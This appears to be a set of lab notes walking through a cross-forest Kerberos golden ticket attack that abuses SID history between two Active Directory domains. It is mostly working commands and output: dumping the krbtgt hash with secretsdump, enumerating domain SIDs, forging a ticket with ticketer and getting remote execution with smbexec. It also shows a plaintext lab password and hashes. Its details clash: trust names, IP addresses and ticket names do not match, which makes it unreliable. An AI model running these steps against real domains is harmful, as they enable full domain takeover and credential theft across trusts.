Golden ticket with external forest, sid history ftw ( Maryland-> NewYork)

This attack can be done only because SID history is enabled on the sevenkingdoms->essos trust

• Find the domain sid with lookupsid.py

  • maryland SID : S-1-5-21-613277262-3067036573-1012442982

  • newyork.local SID: S-1-5-21-620482180-1620433373-1814187987

• Like before extract the krbtgt hash

CHANGE CARMELO ANTHONY's PASSWORD!!!

secretsdump.py -just-dc-user 'maryland/krbtgt' maryland.local/Carmelo.Anthony:'ballislife'@192.168.56.12
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:10f39f5a270977c56ac002b2c9cd660f:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:1d55194c40eb875d732c71cdb38b7f8908373a1d9b4fc3d2be8ed26d90b72baf
krbtgt:aes128-cts-hmac-sha1-96:4cc350abef173c5f7d1d1a47ed8183f7
krbtgt:des-cbc-md5:f8ba9b833dd6b6e0
[*] Cleaning up... 

• We need a group to target on the extra-sid with an RID > 1000 due to SID filter (see Microsoft documentation about sid filtering)

• The group TimesSquare is a perfect match

• Create the golden ticket for a fake user

#newyork.local SID


[*] Brute forcing SIDs at 192.168.56.10
[*] StringBinding ncacn_np:192.168.56.10[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-620482180-1620433373-1814187987

#Maryland.local SID
lookupsid.py  -domain-sids maryland.local/Carmelo.Anthony:'ballislife'@192.168.56.12 0

[*] Brute forcing SIDs at 192.168.56.10
[*] StringBinding ncacn_np:192.168.56.10[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-613277262-3067036573-1012442982

ticketer.py -nthash 10f39f5a270977c56ac002b2c9cd660f \ #KRBTGT HASH
-domain-sid S-1-5-21-613277262-3067036573-1012442982 \ #maryland.local
-domain maryland.local \
-extra-sid S-1-5-21-620482180-1620433373-1814187987-1134 \ #NewYork.local
TimeSquareNYC

export KRB5CCNAME=/home/kali/TimeSquareNYC2.ccache
smbexec.py -k -no-pass TimeSquareNYC2@nyc.newyork.local -debug